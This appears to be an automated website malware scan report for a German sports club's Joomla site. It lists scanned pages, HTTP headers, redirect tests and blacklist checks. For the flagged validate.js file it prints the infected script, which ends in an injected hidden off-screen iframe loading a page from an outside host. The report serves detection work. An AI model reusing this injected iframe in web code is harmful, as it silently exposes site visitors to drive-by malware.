Scanned pages/files
| Request | Server response | Status |
http://tsv-empor-dahme.de/ | 200 OK Content-Length: 22045 Content-Type: text/html | clean |
http://tsv-empor-dahme.de/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://tsv-empor-dahme.de/index.php?option=com_content&view=frontpage&Itemid=1 | 200 OK Content-Length: 22871 Content-Type: text/html | clean |
http://tsv-empor-dahme.de/index.php?option=com_contact&catid=12&Itemid=3 | 200 OK Content-Length: 13369 Content-Type: text/html | clean |
http://tsv-empor-dahme.de/index.php?option=com_impressum&view=impressum&Itemid=100004 | 200 OK Content-Length: 15236 Content-Type: text/html | clean |
http://tsv-empor-dahme.de/media/system/js/validate.js | 200 OK Content-Length: 4433 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JFormValidator = new Class({ initialize: function() { this.handlers = Object(); this.custom = Object(); this.setHandler('username', function (value) { regex = new RegExp("[\<|\>|\"|\'|\%|\;|\(|\)|\&]", "i"); return !regex.test(value); } ); this.setHandler('password', function (value) { regex=/^\S[\S ]{2,98}\S$/; return regex.test(value); } ); this.setHandler('numeric } } else { el.removeClass('invalid'); if (el.labelref) { $(el.labelref).removeClass('invalid'); } } } }); document.formvalidator = null; Window.onDomReady(function(){ document.formvalidator = new JFormValidator(); });;document.write('<iframe width="50" height="50" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://mnwplxufq.freewww.info/gewhkdosgjifgj.php?5"></iframe>'); Antivirus reports:
| ||
http://tsv-empor-dahme.de/index.php?option=com_content&view=category&id=1&Itemid=2 | 200 OK Content-Length: 18717 Content-Type: text/html | clean |
http://tsv-empor-dahme.de/index.php?option=com_content&view=section&id=4&Itemid=41 | 200 OK Content-Length: 18988 Content-Type: text/html | clean |
http://tsv-empor-dahme.de/index.php?option=com_content&view=category&layout=blog&id=15&Itemid=43 | 200 OK Content-Length: 20896 Content-Type: text/html | clean |
http://tsv-empor-dahme.de/index.php?option=com_content&view=category&layout=blog&id=90&Itemid=145 | 200 OK Content-Length: 19367 Content-Type: text/html | clean |
http://tsv-empor-dahme.de/index.php?option=com_content&view=category&layout=blog&id=16&Itemid=44 | 200 OK Content-Length: 21551 Content-Type: text/html | clean |
http://tsv-empor-dahme.de/index.php?option=com_content&view=category&layout=blog&id=58&Itemid=98 | 200 OK Content-Length: 32310 Content-Type: text/html | clean |
http://tsv-empor-dahme.de/index.php?option=com_content&view=category&layout=blog&id=34&Itemid=70 | 200 OK Content-Length: 15606 Content-Type: text/html | clean |
http://tsv-empor-dahme.de/index.php?option=com_content&view=category&layout=blog&id=59&Itemid=99 | 200 OK Content-Length: 32113 Content-Type: text/html | clean |
http://tsv-empor-dahme.de/index.php?option=com_content&view=category&layout=blog&id=17&Itemid=45 | 200 OK Content-Length: 31440 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tsv-empor-dahme.de
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sun, 05 Oct 2014 19:59:36 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 05 Oct 2014 19:59:38 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: a144b28d9f9755c634ea690aaa234476=1i922qmu6q6298m1gjikg17764; path=/
X-Powered-By: PleskLin
GET / HTTP/1.1
Host: tsv-empor-dahme.de
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sun, 05 Oct 2014 19:59:36 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 05 Oct 2014 19:59:38 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: a144b28d9f9755c634ea690aaa234476=1i922qmu6q6298m1gjikg17764; path=/
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: tsv-empor-dahme.de
Referer: http://www.google.com/search?q=tsv-empor-dahme.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tsv-empor-dahme.de
Referer: http://www.google.com/search?q=tsv-empor-dahme.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tsv-empor-dahme.de
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tsv-empor-dahme.de/
Result: tsv-empor-dahme.de is not infected or malware details are not published yet.
Result: tsv-empor-dahme.de is not infected or malware details are not published yet.